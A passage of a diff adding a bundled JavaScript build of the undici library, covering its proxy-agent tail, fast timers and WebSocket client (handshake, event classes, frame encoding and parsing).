removed in the next major version for performance reasons + */ +function throwIfProxyAuthIsSent (headers) { + const existProxyAuth = headers && Object.keys(headers) + .find((key) => key.toLowerCase() === 'proxy-authorization') + if (existProxyAuth) { + throw new InvalidArgumentError('Proxy-Authorization should be sent in ProxyAgent constructor') + } +} + +module.exports = ProxyAgent + + +/***/ }), + +/***/ 9459: +/***/ ((module) => { + +"use strict"; + + +let fastNow = Date.now() +let fastNowTimeout + +const fastTimers = [] + +function onTimeout () { + fastNow = Date.now() + + let len = fastTimers.length + let idx = 0 + while (idx < len) { + const timer = fastTimers[idx] + + if (timer.state === 0) { + timer.state = fastNow + timer.delay + } else if (timer.state > 0 && fastNow >= timer.state) { + timer.state = -1 + timer.callback(timer.opaque) + } + + if (timer.state === -1) { + timer.state = -2 + if (idx !== len - 1) { + fastTimers[idx] = fastTimers.pop() + } else { + fastTimers.pop() + } + len -= 1 + } else { + idx += 1 + } + } + + if (fastTimers.length > 0) { + refreshTimeout() + } +} + +function refreshTimeout () { + if (fastNowTimeout && fastNowTimeout.refresh) { + fastNowTimeout.refresh() + } else { + clearTimeout(fastNowTimeout) + fastNowTimeout = setTimeout(onTimeout, 1e3) + if (fastNowTimeout.unref) { + fastNowTimeout.unref() + } + } +} + +class Timeout { + constructor (callback, delay, opaque) { + this.callback = callback + this.delay = delay + this.opaque = opaque + + // -2 not in timer list + // -1 in timer list but inactive + // 0 in timer list waiting for time + // > 0 in timer list waiting for time to expire + this.state = -2 + + this.refresh() + } + + refresh () { + if (this.state === -2) { + fastTimers.push(this) + if (!fastNowTimeout || fastTimers.length === 1) { + refreshTimeout() + } + } + + this.state = 0 + } + + clear () { + this.state = -1 + } +} + +module.exports = { + setTimeout (callback, delay, opaque) { + return delay < 1e3 + ? setTimeout(callback, delay, opaque) + : new Timeout(callback, delay, opaque) + }, + clearTimeout (timeout) { + if (timeout instanceof Timeout) { + timeout.clear() + } else { + clearTimeout(timeout) + } + } +} + + +/***/ }), + +/***/ 5354: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const diagnosticsChannel = __nccwpck_require__(7643) +const { uid, states } = __nccwpck_require__(9188) +const { + kReadyState, + kSentClose, + kByteParser, + kReceivedClose +} = __nccwpck_require__(7578) +const { fireEvent, failWebsocketConnection } = __nccwpck_require__(5515) +const { CloseEvent } = __nccwpck_require__(2611) +const { makeRequest } = __nccwpck_require__(8359) +const { fetching } = __nccwpck_require__(4881) +const { Headers } = __nccwpck_require__(554) +const { getGlobalDispatcher } = __nccwpck_require__(1892) +const { kHeadersList } = __nccwpck_require__(2785) + +const channels = {} +channels.open = diagnosticsChannel.channel('undici:websocket:open') +channels.close = diagnosticsChannel.channel('undici:websocket:close') +channels.socketError = diagnosticsChannel.channel('undici:websocket:socket_error') + +/** @type {import('crypto')} */ +let crypto +try { + crypto = __nccwpck_require__(6113) +} catch { + +} + +/** + * @see https://websockets.spec.whatwg.org/#concept-websocket-establish + * @param {URL} url + * @param {string|string[]} protocols + * @param {import('./websocket').WebSocket} ws + * @param {(response: any) => void} onEstablish + * @param {Partial} options + */ +function establishWebSocketConnection (url, protocols, ws, onEstablish, options) { + // 1. Let requestURL be a copy of url, with its scheme set to "http", if url’s + // scheme is "ws", and to "https" otherwise. + const requestURL = url + + requestURL.protocol = url.protocol === 'ws:' ? 'http:' : 'https:' + + // 2. Let request be a new request, whose URL is requestURL, client is client, + // service-workers mode is "none", referrer is "no-referrer", mode is + // "websocket", credentials mode is "include", cache mode is "no-store" , + // and redirect mode is "error". + const request = makeRequest({ + urlList: [requestURL], + serviceWorkers: 'none', + referrer: 'no-referrer', + mode: 'websocket', + credentials: 'include', + cache: 'no-store', + redirect: 'error' + }) + + // Note: undici extension, allow setting custom headers. + if (options.headers) { + const headersList = new Headers(options.headers)[kHeadersList] + + request.headersList = headersList + } + + // 3. Append (`Upgrade`, `websocket`) to request’s header list. + // 4. Append (`Connection`, `Upgrade`) to request’s header list. + // Note: both of these are handled by undici currently. + // https://github.com/nodejs/undici/blob/68c269c4144c446f3f1220951338daef4a6b5ec4/lib/client.js#L1397 + + // 5. Let keyValue be a nonce consisting of a randomly selected + // 16-byte value that has been forgiving-base64-encoded and + // isomorphic encoded. + const keyValue = crypto.randomBytes(16).toString('base64') + + // 6. Append (`Sec-WebSocket-Key`, keyValue) to request’s + // header list. + request.headersList.append('sec-websocket-key', keyValue) + + // 7. Append (`Sec-WebSocket-Version`, `13`) to request’s + // header list. + request.headersList.append('sec-websocket-version', '13') + + // 8. For each protocol in protocols, combine + // (`Sec-WebSocket-Protocol`, protocol) in request’s header + // list. + for (const protocol of protocols) { + request.headersList.append('sec-websocket-protocol', protocol) + } + + // 9. Let permessageDeflate be a user-agent defined + // "permessage-deflate" extension header value. + // https://github.com/mozilla/gecko-dev/blob/ce78234f5e653a5d3916813ff990f053510227bc/netwerk/protocol/websocket/WebSocketChannel.cpp#L2673 + // TODO: enable once permessage-deflate is supported + const permessageDeflate = '' // 'permessage-deflate; 15' + + // 10. Append (`Sec-WebSocket-Extensions`, permessageDeflate) to + // request’s header list. + // request.headersList.append('sec-websocket-extensions', permessageDeflate) + + // 11. Fetch request with useParallelQueue set to true, and + // processResponse given response being these steps: + const controller = fetching({ + request, + useParallelQueue: true, + dispatcher: options.dispatcher ?? getGlobalDispatcher(), + processResponse (response) { + // 1. If response is a network error or its status is not 101, + // fail the WebSocket connection. + if (response.type === 'error' || response.status !== 101) { + failWebsocketConnection(ws, 'Received network error or non-101 status code.') + return + } + + // 2. If protocols is not the empty list and extracting header + // list values given `Sec-WebSocket-Protocol` and response’s + // header list results in null, failure, or the empty byte + // sequence, then fail the WebSocket connection. + if (protocols.length !== 0 && !response.headersList.get('Sec-WebSocket-Protocol')) { + failWebsocketConnection(ws, 'Server did not respond with sent protocols.') + return + } + + // 3. Follow the requirements stated step 2 to step 6, inclusive, + // of the last set of steps in section 4.1 of The WebSocket + // Protocol to validate response. This either results in fail + // the WebSocket connection or the WebSocket connection is + // established. + + // 2. If the response lacks an |Upgrade| header field or the |Upgrade| + // header field contains a value that is not an ASCII case- + // insensitive match for the value "websocket", the client MUST + // _Fail the WebSocket Connection_. + if (response.headersList.get('Upgrade')?.toLowerCase() !== 'websocket') { + failWebsocketConnection(ws, 'Server did not set Upgrade header to "websocket".') + return + } + + // 3. If the response lacks a |Connection| header field or the + // |Connection| header field doesn't contain a token that is an + // ASCII case-insensitive match for the value "Upgrade", the client + // MUST _Fail the WebSocket Connection_. + if (response.headersList.get('Connection')?.toLowerCase() !== 'upgrade') { + failWebsocketConnection(ws, 'Server did not set Connection header to "upgrade".') + return + } + + // 4. If the response lacks a |Sec-WebSocket-Accept| header field or + // the |Sec-WebSocket-Accept| contains a value other than the + // base64-encoded SHA-1 of the concatenation of the |Sec-WebSocket- + // Key| (as a string, not base64-decoded) with the string "258EAFA5- + // E914-47DA-95CA-C5AB0DC85B11" but ignoring any leading and + // trailing whitespace, the client MUST _Fail the WebSocket + // Connection_. + const secWSAccept = response.headersList.get('Sec-WebSocket-Accept') + const digest = crypto.createHash('sha1').update(keyValue + uid).digest('base64') + if (secWSAccept !== digest) { + failWebsocketConnection(ws, 'Incorrect hash received in Sec-WebSocket-Accept header.') + return + } + + // 5. If the response includes a |Sec-WebSocket-Extensions| header + // field and this header field indicates the use of an extension + // that was not present in the client's handshake (the server has + // indicated an extension not requested by the client), the client + // MUST _Fail the WebSocket Connection_. (The parsing of this + // header field to determine which extensions are requested is + // discussed in Section 9.1.) + const secExtension = response.headersList.get('Sec-WebSocket-Extensions') + + if (secExtension !== null && secExtension !== permessageDeflate) { + failWebsocketConnection(ws, 'Received different permessage-deflate than the one set.') + return + } + + // 6. If the response includes a |Sec-WebSocket-Protocol| header field + // and this header field indicates the use of a subprotocol that was + // not present in the client's handshake (the server has indicated a + // subprotocol not requested by the client), the client MUST _Fail + // the WebSocket Connection_. + const secProtocol = response.headersList.get('Sec-WebSocket-Protocol') + + if (secProtocol !== null && secProtocol !== request.headersList.get('Sec-WebSocket-Protocol')) { + failWebsocketConnection(ws, 'Protocol was not set in the opening handshake.') + return + } + + response.socket.on('data', onSocketData) + response.socket.on('close', onSocketClose) + response.socket.on('error', onSocketError) + + if (channels.open.hasSubscribers) { + channels.open.publish({ + address: response.socket.address(), + protocol: secProtocol, + extensions: secExtension + }) + } + + onEstablish(response) + } + }) + + return controller +} + +/** + * @param {Buffer} chunk + */ +function onSocketData (chunk) { + if (!this.ws[kByteParser].write(chunk)) { + this.pause() + } +} + +/** + * @see https://websockets.spec.whatwg.org/#feedback-from-the-protocol + * @see https://datatracker.ietf.org/doc/html/rfc6455#section-7.1.4 + */ +function onSocketClose () { + const { ws } = this + + // If the TCP connection was closed after the + // WebSocket closing handshake was completed, the WebSocket connection + // is said to have been closed _cleanly_. + const wasClean = ws[kSentClose] && ws[kReceivedClose] + + let code = 1005 + let reason = '' + + const result = ws[kByteParser].closingInfo + + if (result) { + code = result.code ?? 1005 + reason = result.reason + } else if (!ws[kSentClose]) { + // If _The WebSocket + // Connection is Closed_ and no Close control frame was received by the + // endpoint (such as could occur if the underlying transport connection + // is lost), _The WebSocket Connection Close Code_ is considered to be + // 1006. + code = 1006 + } + + // 1. Change the ready state to CLOSED (3). + ws[kReadyState] = states.CLOSED + + // 2. If the user agent was required to fail the WebSocket + // connection, or if the WebSocket connection was closed + // after being flagged as full, fire an event named error + // at the WebSocket object. + // TODO + + // 3. Fire an event named close at the WebSocket object, + // using CloseEvent, with the wasClean attribute + // initialized to true if the connection closed cleanly + // and false otherwise, the code attribute initialized to + // the WebSocket connection close code, and the reason + // attribute initialized to the result of applying UTF-8 + // decode without BOM to the WebSocket connection close + // reason. + fireEvent('close', ws, CloseEvent, { + wasClean, code, reason + }) + + if (channels.close.hasSubscribers) { + channels.close.publish({ + websocket: ws, + code, + reason + }) + } +} + +function onSocketError (error) { + const { ws } = this + + ws[kReadyState] = states.CLOSING + + if (channels.socketError.hasSubscribers) { + channels.socketError.publish(error) + } + + this.destroy() +} + +module.exports = { + establishWebSocketConnection +} + + +/***/ }), + +/***/ 9188: +/***/ ((module) => { + +"use strict"; + + +// This is a Globally Unique Identifier unique used +// to validate that the endpoint accepts websocket +// connections. +// See https://www.rfc-editor.org/rfc/rfc6455.html#section-1.3 +const uid = '258EAFA5-E914-47DA-95CA-C5AB0DC85B11' + +/** @type {PropertyDescriptor} */ +const staticPropertyDescriptors = { + enumerable: true, + writable: false, + configurable: false +} + +const states = { + CONNECTING: 0, + OPEN: 1, + CLOSING: 2, + CLOSED: 3 +} + +const opcodes = { + CONTINUATION: 0x0, + TEXT: 0x1, + BINARY: 0x2, + CLOSE: 0x8, + PING: 0x9, + PONG: 0xA +} + +const maxUnsigned16Bit = 2 ** 16 - 1 // 65535 + +const parserStates = { + INFO: 0, + PAYLOADLENGTH_16: 2, + PAYLOADLENGTH_64: 3, + READ_DATA: 4 +} + +const emptyBuffer = Buffer.allocUnsafe(0) + +module.exports = { + uid, + staticPropertyDescriptors, + states, + opcodes, + maxUnsigned16Bit, + parserStates, + emptyBuffer +} + + +/***/ }), + +/***/ 2611: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const { webidl } = __nccwpck_require__(1744) +const { kEnumerableProperty } = __nccwpck_require__(3983) +const { MessagePort } = __nccwpck_require__(1267) + +/** + * @see https://html.spec.whatwg.org/multipage/comms.html#messageevent + */ +class MessageEvent extends Event { + #eventInit + + constructor (type, eventInitDict = {}) { + webidl.argumentLengthCheck(arguments, 1, { header: 'MessageEvent constructor' }) + + type = webidl.converters.DOMString(type) + eventInitDict = webidl.converters.MessageEventInit(eventInitDict) + + super(type, eventInitDict) + + this.#eventInit = eventInitDict + } + + get data () { + webidl.brandCheck(this, MessageEvent) + + return this.#eventInit.data + } + + get origin () { + webidl.brandCheck(this, MessageEvent) + + return this.#eventInit.origin + } + + get lastEventId () { + webidl.brandCheck(this, MessageEvent) + + return this.#eventInit.lastEventId + } + + get source () { + webidl.brandCheck(this, MessageEvent) + + return this.#eventInit.source + } + + get ports () { + webidl.brandCheck(this, MessageEvent) + + if (!Object.isFrozen(this.#eventInit.ports)) { + Object.freeze(this.#eventInit.ports) + } + + return this.#eventInit.ports + } + + initMessageEvent ( + type, + bubbles = false, + cancelable = false, + data = null, + origin = '', + lastEventId = '', + source = null, + ports = [] + ) { + webidl.brandCheck(this, MessageEvent) + + webidl.argumentLengthCheck(arguments, 1, { header: 'MessageEvent.initMessageEvent' }) + + return new MessageEvent(type, { + bubbles, cancelable, data, origin, lastEventId, source, ports + }) + } +} + +/** + * @see https://websockets.spec.whatwg.org/#the-closeevent-interface + */ +class CloseEvent extends Event { + #eventInit + + constructor (type, eventInitDict = {}) { + webidl.argumentLengthCheck(arguments, 1, { header: 'CloseEvent constructor' }) + + type = webidl.converters.DOMString(type) + eventInitDict = webidl.converters.CloseEventInit(eventInitDict) + + super(type, eventInitDict) + + this.#eventInit = eventInitDict + } + + get wasClean () { + webidl.brandCheck(this, CloseEvent) + + return this.#eventInit.wasClean + } + + get code () { + webidl.brandCheck(this, CloseEvent) + + return this.#eventInit.code + } + + get reason () { + webidl.brandCheck(this, CloseEvent) + + return this.#eventInit.reason + } +} + +// https://html.spec.whatwg.org/multipage/webappapis.html#the-errorevent-interface +class ErrorEvent extends Event { + #eventInit + + constructor (type, eventInitDict) { + webidl.argumentLengthCheck(arguments, 1, { header: 'ErrorEvent constructor' }) + + super(type, eventInitDict) + + type = webidl.converters.DOMString(type) + eventInitDict = webidl.converters.ErrorEventInit(eventInitDict ?? {}) + + this.#eventInit = eventInitDict + } + + get message () { + webidl.brandCheck(this, ErrorEvent) + + return this.#eventInit.message + } + + get filename () { + webidl.brandCheck(this, ErrorEvent) + + return this.#eventInit.filename + } + + get lineno () { + webidl.brandCheck(this, ErrorEvent) + + return this.#eventInit.lineno + } + + get colno () { + webidl.brandCheck(this, ErrorEvent) + + return this.#eventInit.colno + } + + get error () { + webidl.brandCheck(this, ErrorEvent) + + return this.#eventInit.error + } +} + +Object.defineProperties(MessageEvent.prototype, { + [Symbol.toStringTag]: { + value: 'MessageEvent', + configurable: true + }, + data: kEnumerableProperty, + origin: kEnumerableProperty, + lastEventId: kEnumerableProperty, + source: kEnumerableProperty, + ports: kEnumerableProperty, + initMessageEvent: kEnumerableProperty +}) + +Object.defineProperties(CloseEvent.prototype, { + [Symbol.toStringTag]: { + value: 'CloseEvent', + configurable: true + }, + reason: kEnumerableProperty, + code: kEnumerableProperty, + wasClean: kEnumerableProperty +}) + +Object.defineProperties(ErrorEvent.prototype, { + [Symbol.toStringTag]: { + value: 'ErrorEvent', + configurable: true + }, + message: kEnumerableProperty, + filename: kEnumerableProperty, + lineno: kEnumerableProperty, + colno: kEnumerableProperty, + error: kEnumerableProperty +}) + +webidl.converters.MessagePort = webidl.interfaceConverter(MessagePort) + +webidl.converters['sequence'] = webidl.sequenceConverter( + webidl.converters.MessagePort +) + +const eventInit = [ + { + key: 'bubbles', + converter: webidl.converters.boolean, + defaultValue: false + }, + { + key: 'cancelable', + converter: webidl.converters.boolean, + defaultValue: false + }, + { + key: 'composed', + converter: webidl.converters.boolean, + defaultValue: false + } +] + +webidl.converters.MessageEventInit = webidl.dictionaryConverter([ + ...eventInit, + { + key: 'data', + converter: webidl.converters.any, + defaultValue: null + }, + { + key: 'origin', + converter: webidl.converters.USVString, + defaultValue: '' + }, + { + key: 'lastEventId', + converter: webidl.converters.DOMString, + defaultValue: '' + }, + { + key: 'source', + // Node doesn't implement WindowProxy or ServiceWorker, so the only + // valid value for source is a MessagePort. + converter: webidl.nullableConverter(webidl.converters.MessagePort), + defaultValue: null + }, + { + key: 'ports', + converter: webidl.converters['sequence'], + get defaultValue () { + return [] + } + } +]) + +webidl.converters.CloseEventInit = webidl.dictionaryConverter([ + ...eventInit, + { + key: 'wasClean', + converter: webidl.converters.boolean, + defaultValue: false + }, + { + key: 'code', + converter: webidl.converters['unsigned short'], + defaultValue: 0 + }, + { + key: 'reason', + converter: webidl.converters.USVString, + defaultValue: '' + } +]) + +webidl.converters.ErrorEventInit = webidl.dictionaryConverter([ + ...eventInit, + { + key: 'message', + converter: webidl.converters.DOMString, + defaultValue: '' + }, + { + key: 'filename', + converter: webidl.converters.USVString, + defaultValue: '' + }, + { + key: 'lineno', + converter: webidl.converters['unsigned long'], + defaultValue: 0 + }, + { + key: 'colno', + converter: webidl.converters['unsigned long'], + defaultValue: 0 + }, + { + key: 'error', + converter: webidl.converters.any + } +]) + +module.exports = { + MessageEvent, + CloseEvent, + ErrorEvent +} + + +/***/ }), + +/***/ 5444: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const { maxUnsigned16Bit } = __nccwpck_require__(9188) + +/** @type {import('crypto')} */ +let crypto +try { + crypto = __nccwpck_require__(6113) +} catch { + +} + +class WebsocketFrameSend { + /** + * @param {Buffer|undefined} data + */ + constructor (data) { + this.frameData = data + this.maskKey = crypto.randomBytes(4) + } + + createFrame (opcode) { + const bodyLength = this.frameData?.byteLength ?? 0 + + /** @type {number} */ + let payloadLength = bodyLength // 0-125 + let offset = 6 + + if (bodyLength > maxUnsigned16Bit) { + offset += 8 // payload length is next 8 bytes + payloadLength = 127 + } else if (bodyLength > 125) { + offset += 2 // payload length is next 2 bytes + payloadLength = 126 + } + + const buffer = Buffer.allocUnsafe(bodyLength + offset) + + // Clear first 2 bytes, everything else is overwritten + buffer[0] = buffer[1] = 0 + buffer[0] |= 0x80 // FIN + buffer[0] = (buffer[0] & 0xF0) + opcode // opcode + + /*! ws. MIT License. Einar Otto Stangvik */ + buffer[offset - 4] = this.maskKey[0] + buffer[offset - 3] = this.maskKey[1] + buffer[offset - 2] = this.maskKey[2] + buffer[offset - 1] = this.maskKey[3] + + buffer[1] = payloadLength + + if (payloadLength === 126) { + buffer.writeUInt16BE(bodyLength, 2) + } else if (payloadLength === 127) { + // Clear extended payload length + buffer[2] = buffer[3] = 0 + buffer.writeUIntBE(bodyLength, 4, 6) + } + + buffer[1] |= 0x80 // MASK + + // mask body + for (let i = 0; i < bodyLength; i++) { + buffer[offset + i] = this.frameData[i] ^ this.maskKey[i % 4] + } + + return buffer + } +} + +module.exports = { + WebsocketFrameSend +} + + +/***/ }), + +/***/ 1688: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const { Writable } = __nccwpck_require__(2781) +const diagnosticsChannel = __nccwpck_require__(7643) +const { parserStates, opcodes, states, emptyBuffer } = __nccwpck_require__(9188) +const { kReadyState, kSentClose, kResponse, kReceivedClose } = __nccwpck_require__(7578) +const { isValidStatusCode, failWebsocketConnection, websocketMessageReceived } = __nccwpck_require__(5515) +const { WebsocketFrameSend } = __nccwpck_require__(5444) + +// This code was influenced by ws released under the MIT license. +// Copyright (c) 2011 Einar Otto Stangvik +// Copyright (c) 2013 Arnout Kazemier and contributors +// Copyright (c) 2016 Luigi Pinca and contributors + +const channels = {} +channels.ping = diagnosticsChannel.channel('undici:websocket:ping') +channels.pong = diagnosticsChannel.channel('undici:websocket:pong') + +class ByteParser extends Writable { + #buffers = [] + #byteOffset = 0 + + #state = parserStates.INFO + + #info = {} + #fragments = [] + + constructor (ws) { + super() + + this.ws = ws + } + + /** + * @param {Buffer} chunk + * @param {() => void} callback + */ + _write (chunk, _, callback) { + this.#buffers.push(chunk) + this.#byteOffset += chunk.length + + this.run(callback) + } + + /** + * Runs whenever a new chunk is received. + * Callback is called whenever there are no more chunks buffering, + * or not enough bytes are buffered to parse. + */ + run (callback) { + while (true) { + if (this.#state === parserStates.INFO) { + // If there aren't enough bytes to parse the payload length, etc. + if (this.#byteOffset < 2) { + return callback() + } + + const buffer = this.consume(2) + + this.#info.fin = (buffer[0] & 0x80) !== 0 + this.#info.opcode = buffer[0] & 0x0F + + // If we receive a fragmented message, we use the type of the first + // frame to parse the full message as binary/text, when it's terminated + this.#info.originalOpcode ??= this.#info.opcode + + this.#info.fragmented = !this.#info.fin && this.#info.opcode !== opcodes.CONTINUATION + + if (this.#info.fragmented && this.#info.opcode !== opcodes.BINARY && this.#info.opcode !== opcodes.TEXT) { + // Only text and binary frames can be fragmented + failWebsocketConnection(this.ws, 'Invalid frame type was fragmented.') + return + } + + const payloadLength = buffer[1] & 0x7F + + if (payloadLength <= 125) { + this.#info.payloadLength = payloadLength + this.#state = parserStates.READ_DATA + } else if (payloadLength === 126) { + this.#state = parserStates.PAYLOADLENGTH_16 + } else if (payloadLength === 127) { + this.#state = parserStates.PAYLOADLENGTH_64 + } + + if (this.#info.fragmented && payloadLength > 125) { + // A fragmented frame can't be fragmented itself + failWebsocketConnection(this.ws, 'Fragmented frame exceeded 125 bytes.') + return + } else if ( + (this.#info.opcode === opcodes.PING || + this.#info.opcode === opcodes.PONG || + this.#info.opcode === opcodes.CLOSE) && + payloadLength > 125 + ) { + // Control frames can have a payload length of 125 bytes MAX + failWebsocketConnection(this.ws, 'Payload length for control frame exceeded 125 bytes.') + return + } else if (this.#info.opcode === opcodes.CLOSE) { + if (payloadLength === 1) { + failWebsocketConnection(this.ws, 'Received close frame with a 1-byte body.') + return + } + + const body = this.consume(payloadLength) + + this.#info.closeInfo = this.parseCloseBody(false, body) + + if (!this.ws[kSentClose]) { + // If an endpoint receives a Close frame and did not previously send a + // Close frame, the endpoint MUST send a Close frame in response. (When + // sending a Close frame in response, the endpoint typically echos the + // status code it received.) + const body = Buffer.allocUnsafe(2) + body.writeUInt16BE(this.#info.closeInfo.code, 0) + const closeFrame = new WebsocketFrameSend(body) + + this.ws[kResponse].socket.write( + closeFrame.createFrame(opcodes.CLOSE), + (err) => { + if (!err) { + this.ws[kSentClose] = true + } + } + ) + } + + // Upon either sending or receiving a Close control frame, it is said + // that _The WebSocket Closing Handshake is Started_ and that the + // WebSocket connection is in the CLOSING state. + this.ws[kReadyState] = states.CLOSING + this.ws[kReceivedClose] = true + + this.end() + + return + } else if (this.#info.opcode === opcodes.PING) { + // Upon receipt of a Ping frame, an endpoint MUST send a Pong frame in + // response, unless it already received a Close frame. + // A Pong frame sent in response to a Ping frame must have identical + // "Application data" + + const body = this.consume(payloadLength) + + if (!this.ws[kReceivedClose]) { + const frame = new WebsocketFrameSend(body) + + this.ws[kResponse].socket.write(frame.createFrame(opcodes.PONG)) + + if (channels.ping.hasSubscribers) { + channels.ping.publish({ + payload: body + }) + } + } + + this.#state = parserStates.INFO + + if (this.#byteOffset > 0) { + continue + } else { + callback() + return + } + } else if (this.#info.opcode === opcodes.PONG) { + // A Pong frame MAY be sent unsolicited. This serves as a + // unidirectional heartbeat. A response to an unsolicited Pong frame is + // not expected. + + const body = this.consume(payloadLength) + + if (channels.pong.hasSubscribers) { + channels.pong.publish({ + payload: body + }) + } + + if (this.#byteOffset > 0) { + continue + } else { + callback() + return + } + } + } else if (this.#state === parserStates.PAYLOADLENGTH_16) { + if (this.#byteOffset < 2) { + return callback() + } + + const buffer = this.consume(2) + + this.#info.payloadLength = buffer.readUInt16BE(0) + this.#state = parserStates.READ_DATA + } else if (this.#state === parserStates.PAYLOADLENGTH_64) { + if (this.#byteOffset < 8) { + return callback() + } + + const buffer = this.consume(8) + const upper = buffer.readUInt32BE(0) + + // 2^31 is the maxinimum bytes an arraybuffer can contain + // on 32-bit systems. Although, on 64-bit systems, this is + // 2^53-1 bytes. + // https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Errors/Invalid_array_length + // https://source.chromium.org/chromium/chromium/src/+/main:v8/src/common/globals.h;drc=1946212ac0100668f14eb9e2843bdd846e510a1e;bpv=1;bpt=1;l=1275 + // https://source.chromium.org/chromium/chromium/src/+/main:v8/src/objects/js-array-buffer.h;l=34;drc=1946212ac0100668f14eb9e2843bdd846e510a1e + if (upper > 2 ** 31 - 1) { + failWebsocketConnection(this.ws, 'Received payload length > 2^31 bytes.') + return + } + + const lower = buffer.readUInt32BE(4) + + this.#info.payloadLength = (upper << 8) + lower + this.#state = parserStates.READ_DATA + } else if (this.#state === parserStates.READ_DATA) { + if (this.#byteOffset < this.#info.payloadLength) { + // If there is still more data in this chunk that needs to be read + return callback() + } else if (this.#byteOffset >= this.#info.payloadLength) { + // If the server sent multiple frames in a single chunk + + const body = this.consume(this.#info.payloadLength) + + this.#fragments.push(body) + + // If the frame is unfragmented, or a fragmented frame was terminated, + // a message was received + if (!this.#info.fragmented || (this.#info.fin && this.#info.opcode === opcodes.CONTINUATION)) { + const fullMessage = Buffer.concat(this.#fragments) + + websocketMessageReceived(this.ws, this.#info.originalOpcode, fullMessage) + + this.#info = {} + this.#fragments.length = 0 + } + + this.#state = parserStates.INFO + } + } + + if (this.#byteOffset > 0) { + continue + } else { + callback() + break + } + } + } + + /** + * Take n bytes from the buffered Buffers + * @param {number} n + * @returns {Buffer|null} + */ + consume (n) { + if (n > this.#byteOffset) { + return null + } else if (n === 0) { + return emptyBuffer + } + + if (this.#buffers[0].length === n) { + this.#byteOffset -= this.#buffers[0].length + return this.#buffers.shift() + } + + const buffer = Buffer.allocUnsafe(n) + let offset = 0 + + while (offset !== n) { + const next = this.#buffers[0] + const { length } = next + + if (length + offset === n) { + buffer.set(this.#buffers.shift(), offset) + break + } else if (length + offset > n) { + buffer.set(next.subarray(0, n - offset), offset) + this.#buffers[0] = next.subarray(n - offset) + break + } else { + buffer.set(this.#buffers.shift(), offset) + offset += next.length + } + } + + this.#byteOffset -= n + + return buffer + } + + parseCloseBody (onlyCode, data) { + // https://datatracker.ietf.org/doc/html/rfc6455#section-7.1.5 + /** @type {number|undefined} */ + let code + + if (data.length >= 2) { + // _The WebSocket Connection Close Code_ is + // defined as the status code (Section 7.4) contained in the first Close + // control frame received by the application + code = data.readUInt16BE(0) + } + + if (onlyCode) { + if (!isValidStatusCode(code)) { + return null + } + + return { code } + } + + // https://datatracker.ietf.org/doc/html/rfc6455#section-7.1.6 + /** @type {Buffer} */ + let reason = data.subarray(2) + + // Remove BOM + if (reason[0] === 0xEF && reason[1] === 0xBB && reason[2] === 0xBF) { + reason = reason.subarray(3) + } + + if (code !== undefined && !isValidStatusCode(code)) { + return null + } + + try { + // TODO: optimize this + reason = new TextDecoder('utf-8', { fatal: true }).decode(reason) + } catch { + return null + } + + return { code, reason } + } + + get closingInfo () { + return this.#info.closeInfo + } +} + +module.exports = { + ByteParser +} + + +/***/ }), + +/***/ 7578: +/***/ ((module) => { + +"use strict"; + + +module.exports = { + kWebSocketURL: Symbol('url'), + kReadyState: Symbol('ready state'), + kController: Symbol('controller'), + kResponse: Symbol('response'), + kBinaryType: Symbol('binary type'), + kSentClose: Symbol('sent close'), + kReceivedClose: Symbol('received close'), + kByteParser: Symbol('byte parser') +} + + +/***/ }), + +/***/ 5515: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const { kReadyState, kController, kResponse, kBinaryType, kWebSocketURL } = __nccwpck_require__(7578) +const { states, opcodes } = __nccwpck_require__(9188) +const { MessageEvent, ErrorEvent } = __nccwpck_require__(2611) + +/* globals Blob */ + +/** + * @param {import('./websocket').WebSocket} ws + */ +function isEstablished (ws) { + // If the server's response is validated as provided for above, it is + // said that _The WebSocket Connection is Established_ and that the + // WebSocket Connection is in the OPEN state. + return ws[kReadyState] === states.OPEN +} + +/** + * @param {import('./websocket').WebSocket} ws + */ +function isClosing (ws) { + // Upon either sending or receiving a Close control frame, it is said + // that _The WebSocket Closing Handshake is Started_ and that the + // WebSocket connection is in the CLOSING state. + return ws[kReadyState] === states.CLOSING +} + +/** + * @param {import('./websocket').WebSocket} ws + */ +function isClosed (ws) { + return ws[kReadyState] === states.CLOSED +} + +/** + * @see https://dom.spec.whatwg.org/#concept-event-fire + * @param {string} e + * @param {EventTarget} target + * @param {EventInit | undefined} eventInitDict + */ +function fireEvent (e, target, eventConstructor = Event, eventInitDict) { + // 1. If eventConstructor is not given, then let eventConstructor be Event. + + // 2. Let event be the result of creating an event given eventConstructor, + // in the relevant realm of target. + // 3. Initialize event’s type attribute to e. + const event = new eventConstructor(e, eventInitDict) // eslint-disable-line new-cap + + // 4. Initialize any other IDL attributes of event as described in the + // invocation of this algorithm. + + // 5. Return the result of dispatching event at target, with legacy target + // override flag set if set. + target.dispatchEvent(event) +} + +/** + * @see https://websockets.spec.whatwg.org/#feedback-from-the-protocol + * @param {import('./websocket').WebSocket} ws + * @param {number} type Opcode + * @param {Buffer} data application data + */ +function websocketMessageReceived (ws, type, data) { + // 1. If ready state is not OPEN (1), then return. + if (ws[kReadyState] !== states.OPEN) { + return + } + + // 2. Let dataForEvent be determined by switching on type and binary type: + let dataForEvent + + if (type === opcodes.TEXT) { + // -> type indicates that the data is Text + // a new DOMString containing data + try { + dataForEvent = new TextDecoder('utf-8', { fatal: true }).decode(data) + } catch { + failWebsocketConnection(ws, 'Received invalid UTF-8 in text frame.') + return + } + } else if (type === opcodes.BINARY) { + if (ws[kBinaryType] === 'blob') { + // -> type indicates that the data is Binary and binary type is "blob" + // a new Blob object, created in the relevant Realm of the WebSocket + // object, that represents data as its raw data + dataForEvent = new Blob([data]) + } else { + // -> type indicates that the data is Binary and binary type is "arraybuffer" + // a new ArrayBuffer object, created in the relevant Realm of the + // WebSocket object, whose contents are data + dataForEvent = new Uint8Array(data).buffer + } + } + + // 3. Fire an event named message at the WebSocket object, using MessageEvent, + // with the origin attribute initialized to the serialization of the WebSocket + // object’s url's origin, and the data attribute initialized to dataForEvent. + fireEvent('message', ws, MessageEvent, { + origin: ws[kWebSocketURL].origin, + data: dataForEvent + }) +} + +/** + * @see https://datatracker.ietf.org/doc/html/rfc6455 + * @see https://datatracker.ietf.org/doc/html/rfc2616 + * @see 